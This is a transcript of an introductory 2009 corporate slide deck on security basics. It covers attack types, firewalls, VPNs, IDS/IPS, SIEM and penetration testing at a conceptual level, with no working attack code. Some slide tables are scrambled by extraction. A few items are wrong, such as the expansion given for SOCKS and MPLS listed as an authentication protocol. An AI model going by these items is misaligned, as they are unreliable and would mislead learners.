Basics of Security and Attack
-
Upload
sindhujaashokkumar16 -
Category
Documents
-
view
222 -
download
3
description
Transcript of Basics of Security and Attack
© 2009 Wipro Ltd – Internal & Restricted
Basics of Security and Attack
2 © 2009 Wipro Ltd – Internal & Restricted2 © 2009 Wipro Ltd – Internal & Restricted
Agenda
3
4 Security Attacks
1 Definitions of Security Terms
2 Security Technologies
VA , PT ,VM & Compliances
5 Software Exploits
3 © 2009 Wipro Ltd – Internal & Restricted
1. Definitions of Security TermsWhen > Where >How
4 © 2009 Wipro Ltd – Internal & Restricted4 © 2009 Wipro Ltd – Internal & Restricted
• Protected Resources / Asset: Things to protect • Entry/Exit Points: Ways to get at an asset• Threat: Risks to an asset
– Attack / exploit: An action taken that harms an asset– Vulnerability: Vulnerability is a hole or a weakness in the system, which can
be a design flaw, an implementation bug etc., that allows an attacker to cause harm to the stakeholders of the system. Stakeholders include the application owner, administrators, users, and other entities that rely on the system.
• Risk: Likelihood that vulnerability could be exploited• Mitigation / Countermeasure: Something that addresses a specific
vulnerability
Definitions
5 © 2009 Wipro Ltd – Internal & Restricted5 © 2009 Wipro Ltd – Internal & Restricted
• Asset(s):– $5,000,000 under the mattress
in guest bedroom
• Threat(s):– Loosing the $5,000,000
Terminology Example• Entry/Exit Points:
– Front & Side Doors– Windows (guest bedroom &
elsewhere in residence• Note vulnerability can be shared across
attacks(!)
Threat Attack Vulnerability Risk (0-100)
Loosing the $5,000,000
Burglar breaks in and steals money
Plane glass windows 95
Windows can be lifted out of frame 85
No dead bolt on doors / doors can be kicked in
75
No alarm system 100
House Burns Down
No alarm system 100
6 © 2009 Wipro Ltd – Internal & Restricted6 © 2009 Wipro Ltd – Internal & Restricted
The term "Hacker" may mean simply a person with mastery of computers; however the mass media most often uses "Hacker" as synonymous with a (usually criminal) computer intruder .
In a security context, a hacker is someone involved in computer security/insecurity, specializing in the discovery of exploits in systems (for exploitation or prevention), or in obtaining or preventing unauthorized access to systems through skills, tactics and detailed knowledge
Hacker
7 © 2009 Wipro Ltd – Internal & Restricted7 © 2009 Wipro Ltd – Internal & Restricted
• White hat - Someone who breaks security but who does so for altruistic or at least non-malicious reasons. They generally have a clearly defined code of ethics, and will often attempt to work with a manufacturer or owner to improve discovered security weaknesses.
• Grey hat - A hacker of ambiguous ethics and/or borderline legality, often frankly admitted.• Bluehat - Someone outside computer security consulting firms that are used to bug test a
system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term Bluehat to represent a series of security briefing events.
• Black hat - Someone who subverts computer security without authorization or who uses technology (usually a computer or the Internet) for terrorism, vandalism, credit card fraud, identity theft, intellectual property theft, or many other types of crime. This can mean taking control of a remote computer through a network, or software cracking.
• Script kiddie - Script kiddie is a pejorative term for a computer intruder with little or no skill; a person who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing.
• Hacktivist - A hacktivist is a hacker who utilizes technology to announce a political message. Web vandalism is not necessarily hacktivism.
Types of Hackers
8 © 2009 Wipro Ltd – Internal & Restricted8 © 2009 Wipro Ltd – Internal & Restricted
• Criminal Attacks– Basis is in financial gain– Includes fraud, destruction and theft (personal, brand, identity)
• Privacy Violations– Private/personal information acquired by organizations not authorized.– Includes surveillance, databases, traffic analysis
• Publicity Attacks– Attacker wants to get their name(s) in the papers– Can affect ANY system, not just related to profit centers– Denial of service
• Legal Attack– Setup situation to use discovery process to gather information– Rare, but possibly devastating
Types of Attacks
9 © 2009 Wipro Ltd – Internal & Restricted9 © 2009 Wipro Ltd – Internal & Restricted
• Password sniffing– Collect first parts of data packet and look for login attempts
• IP Spoofing – Fake packet to “hijack” a session and gain access
• DNS Overrides– Malicious access to a DNS server can compromise a network
• Denial of Service Attacks – Single and Distributed– Large number of “SYN” packets to establish dummy connections
• System gets throttled handling all the “hello” requests– Massive number of e-mail messages will flood a system
Methods of Attacking the Network
10 © 2009 Wipro Ltd – Internal & Restricted10 © 2009 Wipro Ltd – Internal & Restricted
• Port scanning – Automated process that looks for open networking ports– Logs positive hits for later exploits
• Buffer overrun packets– Attacker sends carefully built packet to computers on network that support
specific services. (E-mail, IIS)– Packet causes accepting process to abort, leaving system in unknown state,
potentially with root access– Packet contains code that executes to get root access
Methods of Attacking the Network (Contd.)
11 © 2009 Wipro Ltd – Internal & Restricted11 © 2009 Wipro Ltd – Internal & Restricted
• Firewalls– Networking devices (routers) that check traffic coming into a private network– Needs to be complete and properly configured to ensure protection– Good protection for general networking traffic, but specific traffic will still get
through.• DMZs
– Network space between two firewalls • VPNs
– Provides encrypted access from outside a network. – Current versions aren’t reliable enough and aren’t useful against “slow”
attacks.
Methods of Defending a Network
12 © 2009 Wipro Ltd – Internal & Restricted12 © 2009 Wipro Ltd – Internal & Restricted
• Burglar alarms– Traps set on specific networked objects that go off if accessed
• Honey pots– Dummy objects used to attract attacks. Range from single devices to whole
sub networks.
• Vulnerability scanners– Tools that scan a network periodically for holes/open gateways /
misconfigured routers– Limited in scope because of potential damage to the network
• Cryptography– Has potential, but complexity limits its use to local sites.
Methods of Defending a Network (Contd.)
13 © 2009 Wipro Ltd – Internal & Restricted13 © 2009 Wipro Ltd – Internal & Restricted
• Continue to monitor and evolve– Listen to CERT bulletins and evaluate those to your systems– Network with industry acquaintances for possibly new styles of attacks– Try to be proactive– Formalize a security strategy:
• WHO is accessing your data?• WHAT is the key resource(s) you need to protect?• WHEN is data access expected?• WHERE are your users who are accessing your data?
Wrap Up
14 © 2009 Wipro Ltd – Internal & Restricted
2. Security Technologies
15 © 2009 Wipro Ltd – Internal & Restricted15 © 2009 Wipro Ltd – Internal & Restricted
• A firewall is a dedicated appliance, or software running on another computer, which inspects network traffic passing through it; and denies or permits passage based on a set of rules.
• Firewalls make it possible to filter incoming and outgoing traffic that flows through your system.
• A firewall can use one or more sets of “rules” to inspect the network packets as they come in or go out of your network connections and either allows the traffic through or blocks it.
• The rules of a firewall can inspect one or more characteristics of the packets, including but not limited to the protocol type, the source or destination host address and the source or destination port.
Firewalls
16 © 2009 Wipro Ltd – Internal & Restricted16 © 2009 Wipro Ltd – Internal & Restricted
• Service control– Type of service: inbound or outbound
• Traffic filtering — based on IP address & TCP port nr– Provides proxy software to receive or interpret service request before
passing it on– Could also host server software (e.g. Web or mail service)
• Not recommended– Complicates it (more code => more vulnerabilities)
• User Control– Control access to service using ACLs
• Behavior Control– E.g. filter e-mail for spam
General Firewall Techniques
17 © 2009 Wipro Ltd – Internal & Restricted17 © 2009 Wipro Ltd – Internal & Restricted
• All traffic (incoming / outgoing) must pass through firewall
• Only authorized traffic is allowed to pass
• Firewall itself must be immune to penetration– i.e. It must use trusted system with secure OS (minimum size/complexity)– Usually implemented on dedicated device
• Dedicated = only firewall functions performed on this device– Firewall code must be very well protected
Firewall Characteristics
18 © 2009 Wipro Ltd – Internal & Restricted18 © 2009 Wipro Ltd – Internal & Restricted
• Basic kinds of firewalls:– Hardware firewalls
• More common• implemented on router level
– More expensive / more difficult to configure
– Software firewalls• Used in single workstations• less expensive / easier to configure
Firewall Types
19 © 2009 Wipro Ltd – Internal & Restricted19 © 2009 Wipro Ltd – Internal & Restricted
Evolution of Firewalls
PacketFilter
StatefulInspection
Stage of Evolution
ApplicationProxy
Deep Packet Inspection
20 © 2009 Wipro Ltd – Internal & Restricted20 © 2009 Wipro Ltd – Internal & Restricted
• NAT is a technology that hides the private network.
• It allows a single device to act as an intermediary between the Internet and a local network. This effectively means that a single IP address can be used for an entire group of computers.
• Converts private addresses to legally registered public IP addresses.
• NAT is commonly supported by WAN access routers and firewalls.
Network Address Translation (NAT)
21 © 2009 Wipro Ltd – Internal & Restricted21 © 2009 Wipro Ltd – Internal & Restricted
• Lots of vulnerabilities on hosts in network
• Users don’t keep systems up to date– Lots of patches– Lots of exploits in wild (no patch for them)
• Solution?– Limit access to the network
• Don’t trust outsiders• Trust insiders(!!!)
– Put firewalls across the perimeter of the network
Challenges faced
22 © 2009 Wipro Ltd – Internal & Restricted22 © 2009 Wipro Ltd – Internal & Restricted
• Firewall inspects traffic through it• Has a pre-defined policy• Allows traffic specified in the policy• Drops everything else• Two Types
– Packet Filters, Proxies
Firewalls (Contd.)
InternetInternet
Internal NetworkFirewall
23 © 2009 Wipro Ltd – Internal & Restricted23 © 2009 Wipro Ltd – Internal & Restricted
Packet Filters
• Packet filter selectively passes packets from one network interface to another
• Usually done within a router between external and internal networks– screening router
• Can be done by a dedicated network element– packet filtering bridge– harder to detect and attack than screening routers
• Example filters– Block all packets from outside except for SMTP servers– Block all traffic to a list of domains– Block all connections from a specified domain
24 © 2009 Wipro Ltd – Internal & Restricted24 © 2009 Wipro Ltd – Internal & Restricted
Packet Filters (Contd.)
• Data Available– IP source and destination addresses– Transport protocol (TCP, UDP, or ICMP)– TCP/UDP source and destination ports– ICMP message type– Packet options (Fragment Size etc.)
• Actions Available– Allow the packet to go through– Drop the packet (Notify Sender/Drop Silently)– Alter the packet (NAT?)– Log information about the packet
25 © 2009 Wipro Ltd – Internal & Restricted25 © 2009 Wipro Ltd – Internal & Restricted
Typical Firewall Configuration
InternetInternet
IntranetIntranet
DMZDMZ
X X
• Internal hosts can access DMZ and Internet
• External hosts can access DMZ only, not Intranet
• DMZ hosts can access Internet only
• Advantages?– If a service gets compromised in
DMZ it cannot affect internal hosts
26 © 2009 Wipro Ltd – Internal & Restricted26 © 2009 Wipro Ltd – Internal & Restricted
• Stateless packet filtering firewall• Rule à (Condition, Action)• Rules are processed in top-down order
– If a condition satisfied for a packet – action is taken– All rules checked
Example Firewall Rules
27 © 2009 Wipro Ltd – Internal & Restricted27 © 2009 Wipro Ltd – Internal & Restricted
Sample Firewall Rule
Dst Port
Allow
Allow
Yes
Any
> 1023
22
TCP22
TCP> 1023
ExtIntOutSSH-2
IntExtInSSH-1
Dst Addr Proto Ack Set? ActionSrc PortSrc AddrDirRule
• Allow SSH from external hosts to internal hosts– Two rules
• Inbound and outbound
– How to know a packet is for SSH?• Inbound: src-port>1023, dst-port=22• Outbound: src-port=22, dst-port>1023• Protocol=TCP
– Ack Set?– Problems?
SYN
SYN/ACK
ACK
Client Server
28 © 2009 Wipro Ltd – Internal & Restricted28 © 2009 Wipro Ltd – Internal & Restricted
• Egress Filtering– Outbound traffic from external address à Drop– Benefits?
• Ingress Filtering– Inbound Traffic from internal address à Drop– Benefits?
• Default Deny– Why?
Default Firewall Rules
Any
Dst Port
Any DenyAnyAnyIntAnyIntInIngress
DenyAnyAnyExtAnyExtOutEgress
Any DenyAnyAnyAnyAnyAnyAnyDefault
Dst Addr Proto Ack Set? ActionSrc PortSrc AddrDirRule
29 © 2009 Wipro Ltd – Internal & Restricted29 © 2009 Wipro Ltd – Internal & Restricted
• Advantages– Transparent to application/user– Simple packet filters can be efficient
• Disadvantages– Usually fail open– Very hard to configure the rules– Doesn’t have enough information to take actions
• Does port 22 always mean SSH?• Who is the user accessing the SSH?
• What is the fix?
Packet Filters
30 © 2009 Wipro Ltd – Internal & Restricted30 © 2009 Wipro Ltd – Internal & Restricted
• Stateful packet filters– Keep the connection states– Easier to specify rules – connection level– More popular– Problems?
• State explosion• State for UDP/ICMP?
Alternatives
31 © 2009 Wipro Ltd – Internal & Restricted31 © 2009 Wipro Ltd – Internal & Restricted
• Proxy Firewalls– Two connections instead of one– Either at transport level
• SOCKS proxy
– Or at application level• HTTP proxy
• Requires applications (or dynamically linked libraries) to be modified to use the proxy
Alternatives (Contd.)
32 © 2009 Wipro Ltd – Internal & Restricted32 © 2009 Wipro Ltd – Internal & Restricted
• Data Available– Application level information– User information
• Advantages:– Better policy enforcement– Better logging– Fail closed
• Disadvantages:– Doesn’t perform as well– One proxy for each application– Client modification
Proxy Firewall
33 © 2009 Wipro Ltd – Internal & Restricted33 © 2009 Wipro Ltd – Internal & Restricted
• A VPN is a means of carrying private traffic over a public network.• Often used to connect two private networks, over a public network, to
form a virtual network• The word virtual means that, to the users on either end, the two private
networks seem to be seamlessly connected to each other.• That is, they are part of a single virtual private network (although physically
they are two separate networks).à implication? connectivity, security, privacyThe VPN should provide the same connectivity and privacy you would find on a typical local private network.
What is VPN?
34 © 2009 Wipro Ltd – Internal & Restricted34 © 2009 Wipro Ltd – Internal & Restricted
• Based on encryption:– Encrypted VPNs– Nonencrypted VPNs
• Based on OSI model:– Data link layer VPNs– Network layer VPNs– Application layer VPNs
• Based on business functionality:– Intranet VPNs– Extranet VPNs
Different Types of VPNs
35 © 2009 Wipro Ltd – Internal & Restricted35 © 2009 Wipro Ltd – Internal & Restricted
Brief Overview of How it Works
• Two connections – one is made to the Internet and the second is made to the VPN.
• Datagrams – contains data, destination and source information.• Firewalls – VPNs allow authorized users to pass through the firewalls.• Protocols – protocols create the VPN tunnels.
2 main VPN architectures:
• There are products based on IPSec and Point to Point Tunneling Protocol (PPTP) or L2TP (Layer 2 Tunneling Protocol)
• Although IP sec has become the de facto standard for LAN to LAN VPN’s, PPTP and L2TP are heavily used for single client to LAN connections.
• Therefore, many VPN products support IPSec, PPTP and L2TP.
36 © 2009 Wipro Ltd – Internal & Restricted36 © 2009 Wipro Ltd – Internal & Restricted
Technologies
37 © 2009 Wipro Ltd – Internal & Restricted37 © 2009 Wipro Ltd – Internal & Restricted
A virtual point-to-point connectionmade through a public network. It transportsencapsulated datagram.
Tunneling
Encrypted Inner Datagram
Datagram Header Outer Datagram Data Area
Original Datagram
Data Encapsulation [From Comer]
Two types of end points: • Remote Access• Site-to-Site
38 © 2009 Wipro Ltd – Internal & Restricted38 © 2009 Wipro Ltd – Internal & Restricted
VPN Encapsulation of Packets
39 © 2009 Wipro Ltd – Internal & Restricted39 © 2009 Wipro Ltd – Internal & Restricted
• Authentication Header (AH): It is the authenticating protocol
• Encapsulating Security Payload (ESP): ESP is an authenticating and encrypting protocol that provide source authentication, confidentiality, and message integrity.
IPSec uses two Basic Security Protocols
40 © 2009 Wipro Ltd – Internal & Restricted40 © 2009 Wipro Ltd – Internal & Restricted
SSL Architecture
41 © 2009 Wipro Ltd – Internal & Restricted41 © 2009 Wipro Ltd – Internal & Restricted
Authentication Protocols
• Password Authentication Protocol (PAP)• Challenge Handshake Protocol (Chap)• Extensible Authentication Protocol (EAP)• MPLS – Multi Protocol Label Switching• Terminal Access Controller Access-Control System (TACACS)• Remote Authentication Dial In User Service (RADIUS) • Secured Over Credential-based Kerberos Services - SOCKS
42 © 2009 Wipro Ltd – Internal & Restricted42 © 2009 Wipro Ltd – Internal & Restricted
VPN Comparisons
43 © 2009 Wipro Ltd – Internal & Restricted43 © 2009 Wipro Ltd – Internal & Restricted
It is better to prevent attack than to detect it after it succeeds, Unfortunately,
not all attacks can be prevented.
Some attackers become intruders — succeed in breaking defenses
Intrusion Prevention — first line of defense
Intrusion Detection — second line of defense
Intrusion Detection System (IDS) - a device (typically a seprate computer)
monitoring system activities to detect malicious / suspicious events like
attacks.
• IDS runs constantly in the background - it alarms when it detects something suspicious.
• IDS should operate in stealth mode - be invisible to outside world
• IDSs attempt to detect
• Outsiders breaking into a system OR
Insiders (legitimate users) performing illegitimate actions accidentally ordeliberately
IDS Definition
44 © 2009 Wipro Ltd – Internal & Restricted44 © 2009 Wipro Ltd – Internal & Restricted
• Anomaly — abnormal behavior• Misuse — activity that violates the security policy
(subset of “anomaly”)• Intrusion — misuse by outsiders and insiders • Audit — activity of looking at user/system behavior,
its effects, or collected data• Profiling — looking at users or systems to determine ‘what they
usually do’
IDS Terminology
45 © 2009 Wipro Ltd – Internal & Restricted45 © 2009 Wipro Ltd – Internal & Restricted
• Host-based IDS (HIDS)– Runs on a host– Monitors activities on this host only
• Network-based IDS (NIDS)– Stand–alone device– Monitors entire (sub) network
Hybrid types with respect to operationi. Signature-based IDSsii. Anomaly-based IDSs (heristic IDSs)
(a) Misuse intrusion detectioniii. Other IDS types
Types of IDS
46 © 2009 Wipro Ltd – Internal & Restricted46 © 2009 Wipro Ltd – Internal & Restricted
• Program on one specific host• Analyses activity on that host
– System calls– file-system modifications– Memory integrity
• Vulnerable to attacks, since they are part ofthe monitored system
• No protection against Do's attacks
Host-based IDS
47 © 2009 Wipro Ltd – Internal & Restricted47 © 2009 Wipro Ltd – Internal & Restricted
• Analyze network traffic by inspecting packets– easy in non-switched networks– switched networks:– network tap or port mirroring– only monitor traffic in specific – segments (e.g. traffic via gateway)
• Can become bottlenecks inhigh-speed networks
• Cannot analyze encrypted packets
Network-based IDS
48 © 2009 Wipro Ltd – Internal & Restricted48 © 2009 Wipro Ltd – Internal & Restricted
• Mostly for NIDS• Match ongoing activities against known patterns (“signatures”)• Pre-processing may be necessary (E.g. reassemble fragmented packets)• Analyze packet headers: port scans, SYN floods, …• Analyze payload: malicious code, …
Signature Recognition
49 © 2009 Wipro Ltd – Internal & Restricted49 © 2009 Wipro Ltd – Internal & Restricted
• Create patterns for normal user activity• Detect deviations from this patterns
– E.g. Secretary uses browser, email-client and text processor between 08.00 and 16.00; using nmap and gcc at 23.00 is abnormal
• Neural nets could be used• Problem: Users’ behavior is analyzed means privacy is compromised
Anomaly Detection
50 © 2009 Wipro Ltd – Internal & Restricted50 © 2009 Wipro Ltd – Internal & Restricted
• Attackers use avoidance strategies to avoid detection by IDS• IDS sensitivity is difficult to measure and adjust• Must strike a balance false alarms and missing attacks• Only as good as the process/people using it• HIDS are vulnerable to attacks since they run on the monitored
machine • NIDS can become bottlenecks in high speed networks• NIDS cannot deal with encrypted connections• Only “known” attacks can be detected• Heuristics and neural nets can produce false positives
Limits of IDS
51 © 2009 Wipro Ltd – Internal & Restricted51 © 2009 Wipro Ltd – Internal & Restricted
• Intrusion prevention system – It is a computer security device that monitors network and/or system activities for malicious or unwanted behavior and can react, in real-time, to block or prevent those activities. Network-based IPS, for example, will operate in-line to monitor all network traffic for malicious code or attacks. When an attack is detected, it can drop the offending packets while still allowing all other traffic to pass. Intrusion prevention technology is considered by some to be an extension of intrusion detection (IDS) technology. The term "Intrusion Prevention System" was coined by Andrew Plato.
• Host Based
• Network Based– Content Based– Protocol Analysis– Rate Based
IPS
52 © 2009 Wipro Ltd – Internal & Restricted52 © 2009 Wipro Ltd – Internal & Restricted
• A host based IPS (HIPS) is one where the intrusion-prevention application is resident on that specific IP address, usually on a single computer
• As with Host IDS systems, the Host IPS relies on agents installed directly on the system being protected. It binds closely with the operating system kernel and services, monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them.
• It may also monitor data streams and the environment specific to a particular application (file locations and Registry settings for a Web server, for example) in order to protect that application from generic attacks for which no “signature” yet exists.
• Since a Host IPS agent intercepts all requests to the system it protects, it has certain prerequisites - it must be very reliable, must not negatively impact performance, and must not block legitimate traffic.
Host Based IPS
53 © 2009 Wipro Ltd – Internal & Restricted53 © 2009 Wipro Ltd – Internal & Restricted
• A network based IPS is one where the IPS application/hardware and any actions taken to prevent an intrusion on a specific network host(s) is done from a host with another IP address on the network (This could be on a front-end firewall appliance.)
• Network intrusion prevention systems (NIPS) are purpose-built hardware/software platforms that are designed to analyze, detect, and report on security related events. NIPS are designed to inspect traffic and based on their configuration or security policy, they can drop malicious traffic.
Network Based IPS (NIPS)
54 © 2009 Wipro Ltd – Internal & Restricted54 © 2009 Wipro Ltd – Internal & Restricted
• A content-based IPS (CBIPS) inspects the content of network packets for unique sequences, called signatures, to detect and hopefully prevent known types of attack such as worm infections and hacks.
Content Based IPS
55 © 2009 Wipro Ltd – Internal & Restricted55 © 2009 Wipro Ltd – Internal & Restricted
• Protocol analyzers can natively decode application-layer network protocols, like HTTP or FTP. Once the protocols are fully decoded, the IPS analysis engine can evaluate different parts of the protocol for anomalous behavior or exploits.
• For example, the existence of a large binary file in the User-Agent field of an HTTP request would be very unusual and likely an intrusion. A protocol analyzer could detect this anomalous behavior and instruct the IPS engine to drop the offending packets.
• Since many vulnerabilities have dozens or even hundreds of exploit variants, pattern recognition-based IPS/IDS engines can be evaded. For example, some pattern recognition engines require hundreds of different signatures (or patterns) to protect against a single vulnerability.
• This is because they must have a different pattern for each exploit variant. Protocol analysis-based products can often block exploits with a single signature that monitors for the specific vulnerability in the network communications.
Protocol Analysis
56 © 2009 Wipro Ltd – Internal & Restricted56 © 2009 Wipro Ltd – Internal & Restricted
• Rate based IPS (RBIPS) are primarily intended to prevent Denial of Service and Distributed Denial of Service attacks. They work by monitoring and learning normal network behaviors.
• Through real-time traffic monitoring and comparison with stored statistics, RBIPS can identify abnormal rates for certain types of traffic e.g. TCP, UDP or ARP packets, connections per second, packets per connection, packets to specific ports etc. Attacks are detected when thresholds are exceeded. The thresholds are dynamically adjusted based on time of day, day of the week etc., drawing on stored traffic statistics.
• Unusual but legitimate network traffic patterns may create false alarms. The system's effectiveness is related to the granularity of the RBIPS rulebase and the quality of the stored statistics.
• Once an attack is detected, various prevention techniques may be used such as rate-limiting specific attack-related traffic types, source or connection tracking, and source-address, port or protocol filtering (black-listing) or validation (white-listing).
Rate Based IPS
57 © 2009 Wipro Ltd – Internal & Restricted57 © 2009 Wipro Ltd – Internal & Restricted
• HIPS can handle encrypted and unencrypted traffic equally, because it can analyze the data after it has been decrypted on the host.
• NIPS does not use processor and memory on computer hosts but uses its own CPU and memory.
• NIPS is a single point of failure, which is considered a disadvantage; however, this property also makes it simpler to maintain. However, this attribute applies to all network devices like routers and switches and can be overcome by implementing the network accordingly (failover path, etc.).
• A Bypass Switch can be implemented to alleviate the single point of failure disadvantage though. This also allows the NIPS appliance to be moved and be taken off-line for maintenance when needed.
• NIPS can detect events scattered over the network (e.g. low level event targeting many different hosts, like hostscan, worm) and can react, whereas with a HIPS, only the hosts data itself is available to take a decision, respectively it would take too much time to report it to a central decision making engine and report back to block.
Host based VS Network based IPS
58 © 2009 Wipro Ltd – Internal & Restricted58 © 2009 Wipro Ltd – Internal & Restricted
• Trap to attract attacks• Assign unused address space to one (dummy) host (“honeypot”)• Simulate services or proxy servers• Legitimate users never communicate with the honeypot• Automated attacks (e.g. worms) cannot distinguish the honeypot from a normal
host• All activity can be logged for evidence• New attacks can be analyzed. Eg:
– Simulate open SMTP relay– Drop all incoming mail without looking at it– Spammers can be identified– Legal measures possible– Spam has been destroyed efficiently
Honeypot
59 © 2009 Wipro Ltd – Internal & Restricted59 © 2009 Wipro Ltd – Internal & Restricted
• SIM is the industry-specific term in computer security referring to the collection of data (typically log files; e.g. eventlogs) into a central repository for trend analysis.
• SIM is a solution which allows automated integration of log analysis, event correlation, and reporting of critical security event
information to enable organizations to immediately identify and respond to various threats.
• There are four major components of a SIM. They are client components, correlation engine, signature database and a management console
Security Information Management (SIM)
60 © 2009 Wipro Ltd – Internal & Restricted60 © 2009 Wipro Ltd – Internal & Restricted
SIM
TraceabilityConsolidation
Event Event Event Event Event Event
ReportingMeta Alerting
@
Event EventEvent
SIM
61 © 2009 Wipro Ltd – Internal & Restricted61 © 2009 Wipro Ltd – Internal & Restricted
The best way to increase the effectiveness of information security architecture for an organization is through better analysis and an increasingly popular analysis technique is event correlation. Unfortunately, conducting correlation without using security event management software is nearly impossible because of these issues:• Event data is logged in a variety of proprietary formats making comparison
difficult.• Event data is stored in multiple information ‘silos’, i.e. proprietary consoles,
syslogs etc.• Manually comparing event data from across the enterprise to find
similarities is time consuming, if not impossible.• No manual method exists that enables correlation to be conducted in real
time.• Constantly evolving threats necessitates continuously adding, modifying and
enhancing correlation techniques.
Need for SIM
62 © 2009 Wipro Ltd – Internal & Restricted62 © 2009 Wipro Ltd – Internal & Restricted
• Aggregation is the process by which the events collected from various devices are normalized and indexed.
• The correlation engine then analysis and validate the event logs sent by the log collector components based on rules or statistics stored in the database.
• Once the event is validated then it is passed on to the management console where the security professionals can view the alerts in one single console.
• The security professionals can view and monitor events related to various devices or servers in one single format and in one single console.
Aggregation and Correlation
63 © 2009 Wipro Ltd – Internal & Restricted63 © 2009 Wipro Ltd – Internal & Restricted
SIM Architecture - Aggregation
64 © 2009 Wipro Ltd – Internal & Restricted64 © 2009 Wipro Ltd – Internal & Restricted
SIM Architecture -CorrelationPolicy RulesRegulatory Asset GroupsHost Info DetailsVulnerability Details
Asset Criticality weighingActive List-Asset GroupsActive List-Business Units
Vulnerability Scanner
Asset Management
Correlation Engine
Statistical Threat Analysis
Rule Based Vulnerability
65 © 2009 Wipro Ltd – Internal & Restricted65 © 2009 Wipro Ltd – Internal & Restricted
SIM Architecture – Output
66 © 2009 Wipro Ltd – Internal & Restricted66 © 2009 Wipro Ltd – Internal & Restricted
According to Gartner:• "Security information and event management (SIEM) technology delivers two basic
capabilities:• Security information management (SIM) — SIM provides reporting and analysis of
data primarily from host systems and applications, and secondarily from security devices to support regulatory compliance initiatives, internal threat management and security policy compliance management. SIM can be used to support the activities of the IT security, internal audit and compliance organizations.
• Security event management (SEM) — SEM improves security incident response capabilities. SEM processes near-real-time data from security devices, network devices and systems to provide real-time event management for security operations.
• SEM helps IT security operations personnel be more effective in responding to external and internal threats.
• SIM and SEM require a common set of base functions, but they differ both in scope and the time frame for data analysis"
SIM VS SEM
67 © 2009 Wipro Ltd – Internal & Restricted67 © 2009 Wipro Ltd – Internal & Restricted
SIM VS SEM
68 © 2009 Wipro Ltd – Internal & Restricted
3. VA , PT ,VM & Compliances
69 © 2009 Wipro Ltd – Internal & Restricted69 © 2009 Wipro Ltd – Internal & Restricted
Access Control
Authentication
Non-repudiation
Data Confidentiality
Communication Security
Data Integrity
Availability
Privacy
• Limit & control access to network elements, services & applications
• Examples: password, ACL, firewall
• Prevent ability to deny that an activity on the network occurred
• Examples: system logs, digital signatures
• Ensure information only flows from source to destination
• Examples: VPN, MPLS, L2TP
• Ensure network elements, services and application available to legitimate users
• Examples: IDS/IPS, network redundancy, BC/DR
• Provide Proof of Identity• Examples: shared secret,
PKI, digital signature, digital certificate
• Ensure confidentiality of data • Example: encryption
• Ensure data is received as sent or retrieved as stored
• Examples: MD5, digital signature, anti-virus software
• Ensure identification and network use is kept private
• Examples: NAT, encryption
Network Vulnerabilities : Security Perspective
Eight Security Dimensions applied to each Security Perspective (layer and plane)
70 © 2009 Wipro Ltd – Internal & Restricted70 © 2009 Wipro Ltd – Internal & Restricted
Vulnerability ManagementVulnerability Management
To overcome the growing risk posed by vulnerabilities, an organization must develop a formal vulnerability management program addressing the entire life cycle of vulnerability management as shown in FIG A. All of these must be supported by an underlying foundation of people, process and technology initiatives.
Asset Management Vulnerability Assessment
Report Information
Asset update
Asset profile
Report information
Prioritized asset list
Prioritization of assets
Remediation
Monitoring
Reporting
Report information
Vulnerabilities list
Detailed report on vulnerability management
FIG A – Vulnerability Management Lifecycle
71 © 2009 Wipro Ltd – Internal & Restricted71 © 2009 Wipro Ltd – Internal & Restricted
Asset Management
Asset Management• To get a confident start to a VM process it is very important to have an accurate
inventory and profile of what the infrastructure contains. For an organization of any significant size, this inventory will be complex and constantly changing as new components are added and existing components are retired. The below mentioned steps aid in making a comprehensive asset inventory
• Identification of assets can be done either manually, or by using an automated tool like an asset management software
• Discovered assets must be reviewed to determine business criticality and risk tolerance
• The individuals accountable for the assets must be identified
72 © 2009 Wipro Ltd – Internal & Restricted72 © 2009 Wipro Ltd – Internal & Restricted
Vulnerability Assessment
Vulnerability Assessment• Once the identification of the network assets is done, a vulnerability assessment
should be carried out to find the vulnerabilities existing in the network. Many software tools exist that can aid in the discovery (and sometimes removal) of vulnerabilities in a computer system.
• QualysGuard ,GFI LANguard Network Security Scanner ,Nessus
• Though these tools can provide a good overview of possible vulnerabilities present, they can not replace human judgment. Relying solely on scanners will yield false positives and a limited-scope view of the problems present in the system. Therefore, a proper vulnerability assessment system should make use of vulnerability scanner tools to identify potential vulnerabilities and then carry out a detailed vulnerability analysis to remove false positives.
73 © 2009 Wipro Ltd – Internal & Restricted73 © 2009 Wipro Ltd – Internal & Restricted
Penetration Test
– Attack and Penetration Testing is a systematic approach to identifying weaknesses in deployed targets.
– A target may be a network, a collection of hosts, or an application that is part of an organization, function or enterprise segment to be analyzed.
• If a vulnerability is utilized by an unauthorized individual to access company resources, company resources can be compromised.
• A penetration test is used to show where security fails.
• Penetration testing can be performed by anyone who is either knowledgeable in this area and keeps up to date with the latest security news, penetration applications and researching ways of attacks.
74 © 2009 Wipro Ltd – Internal & Restricted74 © 2009 Wipro Ltd – Internal & Restricted
Types Of Penetration Testing
Black Box Penetration Testing
Pen tester has no information of the target network. Only the company name or the IP address is known network topology etc..) of the remotenetwork environment
White Box Penetration Testing
Pen tester provided with significant knowledge of the target network. Information about network devices (i.e. Routers, Switches), Web Serverdetails, Operating System type, Database platform ,Load balancers,
Firewalls.
75 © 2009 Wipro Ltd – Internal & Restricted75 © 2009 Wipro Ltd – Internal & Restricted
Types of Environment•• Wireless Networks Wireless Networks •• DMZ environmentsDMZ environments•• Internet Data Centers (IDC)Internet Data Centers (IDC)•• Portal EnvironmentPortal Environment•• ExtranetExtranet•• VPN Termination pointsVPN Termination points•• Remote Access pointsRemote Access points•• DialDial--InIn•• Web ApplicationWeb Application•• DatabaseDatabase• Routers, switches, servers, FWs, IDSes• The organization as a whole• Individuals and their workstations• Other networking capable devices
76 © 2009 Wipro Ltd – Internal & Restricted76 © 2009 Wipro Ltd – Internal & Restricted
Penetration Testing Methodology
Analysis &Planning
Scope/GoalDefinition
Clean UpReporting
PrivilegeEscalation
InformationGathering Penetration
VulnerabilityDetection Attack
77 © 2009 Wipro Ltd – Internal & Restricted77 © 2009 Wipro Ltd – Internal & Restricted
Network Penetration Testing
